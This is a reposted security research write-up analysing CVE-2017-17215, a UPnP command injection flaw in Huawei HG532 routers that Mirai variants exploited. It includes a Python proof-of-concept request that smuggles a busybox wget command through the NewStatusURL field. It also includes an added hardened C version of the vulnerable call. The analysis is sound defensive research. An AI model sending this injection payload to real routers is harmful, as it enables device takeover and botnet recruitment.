Analysis of the Remote Command Execution Vulnerability in Huawei HG532 Series Routers

Posted by punzalan at 2020-02-27

Author: Fenix @ Knownsec 404 Team. English version:


The Huawei HG532 series router is a high-speed wireless router aimed at home and small-office users.

On November 27, 2017, Check Point Software Technologies reported a remote command execution vulnerability (CVE-2017-17215) in Huawei HG532 products [1].

Before the vulnerability was reported, it was already being exploited on a large scale across many countries without attracting attention. The payload has been identified as Okiru/Satori, an upgraded variant of the well-known Mirai malware. Its function is very simple: it mainly sends carefully crafted UDP/TCP packets to launch DDoS attacks against its targets.

On November 23, 2017, the ZoomEye network probe system of the Knownsec 404 Team also captured the payload of this attack.

Vulnerability analysis

Firmware Download

Public firmware for the HG532e is available online; see [2] for the download address.

Download the firmware and extract it directly with binwalk.

The target system is 32-bit big-endian MIPS.

Vulnerability analysis

According to the Check Point report [1], the remote command execution vulnerability is located in the UPnP service.

UPnP was created by the Universal Plug and Play Forum (UPnP Forum). The goal of the protocol is to let all kinds of devices in home networks (for data sharing, communication and entertainment) and company networks connect to each other seamlessly, and to simplify the implementation of the related networking.

The upnp program that provides the UPnP service in the firmware is loaded directly into IDA.

The vulnerable code is located by searching for the string NewStatusURL.


Follow the data cross-references.

The vulnerable code is as follows.

The definition of the ATP_XML_GetChildNodeByName function is as follows.

The program first parses the SOAP XML message to obtain the values of the elements NewDownloadURL and NewStatusURL. It then splices them into a command string as shown below and finally passes that string to the system() function for execution.

snprintf($s0, 0x400, "upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -", NewDownloadURL, NewStatusURL);
system($s0);

upg is the router's upgrade program. Its parameters are as follows.


We now have two command injection points: NewDownloadURL and NewStatusURL.
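For comparison, the same upg invocation written so that neither element can inject a command. This is an added example, not the page's or Huawei's code; the upg path, the URL allowlist and the helper names are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed hardening of the upg call above (example, not Huawei's code):
 * URLs pass an allowlist, then reach upg as an argv array via execv(), not system(). */
#define UPG_PATH "/bin/upg" /* placeholder: the page does not give the real path */
#define UPG_ARGC 12
/* Only http(s) URLs from a conservative character set pass; ';', '`', '$',
 * '|', quotes and whitespace are all rejected. */
bool url_is_safe(const char *url)
{
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0)
        return false;
    for (size_t n = 0; url[n] != '\0'; n++) {
        unsigned char c = (unsigned char)url[n];
        if (n >= 256 /* length cap */ || (!isalnum(c) && strchr("-._~:/?=&%", c) == NULL))
            return false;
    }
    return true;
}
/* Same command line as the vulnerable snprintf(), but as separate argv entries.
 * Returns UPG_ARGC, or 0 if a URL is rejected; argv needs UPG_ARGC + 1 slots. */
int build_upg_argv(const char *argv[], const char *download, const char *status)
{
    if (!url_is_safe(download) || !url_is_safe(status))
        return 0;
    const char *args[UPG_ARGC + 1] = {
        UPG_PATH, "-g", "-U", download, "-t", "1 Firmware Upgrade Image",
        "-c", "upnp", "-r", status, "-d", "-", NULL };
    memcpy(argv, args, sizeof(args));
    return UPG_ARGC;
}
/* Fork and execv() the validated argv; returns upg's exit status, or -1. */
int run_upg(const char *download, const char *status)
{
    const char *argv[UPG_ARGC + 1];
    pid_t pid;
    if (build_upg_argv(argv, download, status) == 0 || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv); /* argv array, no shell */
        _exit(127);
    }
    int wstatus;
    return waitpid(pid, &wstatus, 0) == pid && WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : -1;
}
```

With this layout the ';' in the page's NewStatusURL value is rejected by url_is_safe, and even an unvalidated value could not reach a shell because no shell is started.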

Vulnerability verification

The target system provides the following commands.

The wget command is used for the test. Send the following request.

import requests

headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}

# The SOAP namespace URLs and the wget listener address were lost when the page was extracted; they are left as they appear.
data = '''<?xml version="1.0" ?>
<s:Envelope xmlns:s="" s:encodingStyle="">
  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
    <NewStatusURL>;/bin/busybox wget -g -l /tmp/1 -r /1;</NewStatusURL>
    <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  </u:Upgrade>
</s:Body>
</s:Envelope>
'''

# Port 37215 and the path /ctrlt/DeviceUpgrade_1 are given on the page; the router address is a placeholder.
requests.post("http://<router-ip>:37215/ctrlt/DeviceUpgrade_1", headers=headers, data=data)

As you can see, the request was received on the listening port.

It is worth mentioning that both the UPnP service and the firewall of the HG532e are enabled by default, and the default firewall level is low.

By default, access to port 37215 from the WAN side is blocked by the firewall, so the vulnerability cannot be exploited from the WAN.

Protection plan

On November 30, 2017, Huawei officially released a security bulletin [4] confirming the vulnerability. The bulletin lists the following mitigation measures:

No firmware upgrade package was found, so no patch analysis was performed.


Reference links

[1] Check Point vulnerability report
[2] HG532e firmware download: 20hg532e.rar
[3] Irish broadband router settpserver command injection
[4] Huawei security bulletin

This article was published by Seebug Paper. Please indicate the source when reprinting. Address: